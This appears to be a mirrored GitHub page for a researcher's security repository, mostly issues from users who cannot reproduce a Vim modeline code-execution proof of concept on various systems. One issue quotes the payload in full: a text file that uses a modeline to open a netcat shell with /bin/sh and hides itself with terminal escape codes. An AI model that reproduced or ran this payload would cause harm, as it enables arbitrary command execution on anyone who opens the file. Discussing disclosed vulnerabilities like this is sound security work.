Coder Social home page Coder Social logo

security's Introduction

security

This repository will contain security-related stuff I'm doing. (Also, @rawsec on Twitter)

Recent:

More to come...


CTF write-ups:

My answers on Security.SE (many trivial, but also a few interestinig ones).

Some older bugs:

security's People

Contributors

numirias avatar technologyclassroom avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

security's Issues

This vuln doesn't work for my system. please check it

Hi,

I would like to confirm this poc with VIM version 8.0.1453 which is vuln version
but it doesn't work for me.
image

I set "modeline" to be activated to /etc/vim/vimrc( i tested with 2 thing, set modeline, :set modeline)
캡처

I check with command line "set modeline?"
modline was activated properly...
image

and then I open poc.txt with vim.
nothing happened. Do you know what problem is??
test poc is like below
캡처1

:

poc2 can`t run properly on ubuntu 18.04

I got this

cat shell.txt

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

vim shell.txt
"shell.txt" 1L, 264C
处理 modelines 时发生错误:
第 1 行:
E518: 未知的选项: \|\

Not working for Mac osx

Hi,

The modeline is by default enabled on Mac osx. However, both payloads stated in your advisory are not working for Mac with outdated Vim version. They work fine on Ubuntu OS. Is is possible that the implementation of Vim is different? Can you take a look at what happened?

can't reproduce on vim 8.1.0648-r1

Hello,

I'm trying the poc on this a vim 8.1.0648-r1 but it doesn't work.

I'm not using vim and have barely knownledge of this editor but here what I have checked so far :

By default :set modelines? show nomodeline. I created a .vimrc with the following content

set modelines=1
set modeline

and run like

vim -u .vimrc and

:set modelines? show modeline. I saved the file poc.txt found in this repo and opened it with vim -u .vimrc poc.txt but it didn't return a uname -a but instead display the content of the file.

vim --version

VIM - Vi IMproved 8.1 (2018 May 18, compiled May 10 2019 13:57:46)
Included patches: 1-648
Modified by Gentoo-8.1.0648-r1
Compiled by portage@localhost
Tiny version without GUI. Features included (+) or not (-):
+acl -extra_search -mouse_sgr -tcl
-arabic -farsi -mouse_sysmouse -termguicolors
+autocmd -file_in_path -mouse_urxvt -terminal
-autochdir -find_in_path -mouse_xterm +terminfo
-autoservername -float -multi_byte -termresponse
-balloon_eval -folding -multi_lang -textobjects
-balloon_eval_term -footer -mzscheme -textprop
-browse +fork() -netbeans_intg -timers
+builtin_terms -gettext -num64 -title
-byte_offset -hangul_input -packages -toolbar
-channel -iconv -path_extra -user_commands
-cindent -insert_expand -perl -vartabs
-clientserver -job -persistent_undo +vertsplit
-clipboard -jumplist -printer -virtualedit
-cmdline_compl -keymap -profile +visual
-cmdline_hist -lambda -python -visualextra
-cmdline_info -langmap -python3 -viminfo
-comments -libcall -quickfix +vreplace
-conceal -linebreak -reltime +wildignore
-cryptv -lispindent -rightleft -wildmenu
-cscope +listcmds -ruby +windows
+cursorbind -localmap +scrollbind +writebackup
-cursorshape -lua -signs -X11
-dialog -menu -smartindent -xfontset
-diff -mksession -startuptime -xim
-digraphs -modify_fname -statusline -xpm
-dnd -mouse -sun_workshop -xsmp
-ebcdic -mouse_dec -syntax -xterm_clipboard
-emacs_tags -mouse_gpm +tag_binary -xterm_save
-eval -mouse_jsbterm -tag_old_static
+ex_extra -mouse_netterm -tag_any_white
system vimrc file: "/etc/vim/vimrc"
user vimrc file: "$HOME/.vimrc"
2nd user vimrc file: "~/.vim/vimrc"
user exrc file: "$HOME/.exrc"
defaults file: "$VIMRUNTIME/defaults.vim"
fall-back for $VIM: "/usr/share/vim"
Compilation: x86_64-gentoo-linux-musl-gcc -c -I. -Iproto -DHAVE_CONFIG_H -O2 -pipe -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1
Linking: x86_64-gentoo-linux-musl-gcc -Wl,-O1 -L/usr/local/lib -Wl,--as-needed -o vim -lm -lncurses -lelf

I suppose on of those feature must be enabled in order to make the poc working, but didn't find yet which on...

Thanks

How to construct poc on vim74?

Hi,

I realize that function assert_fails is added in version 8, does that mean vim74 is not affected by this vulnerability, or how could I construct poc on vim74?

Thanks

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.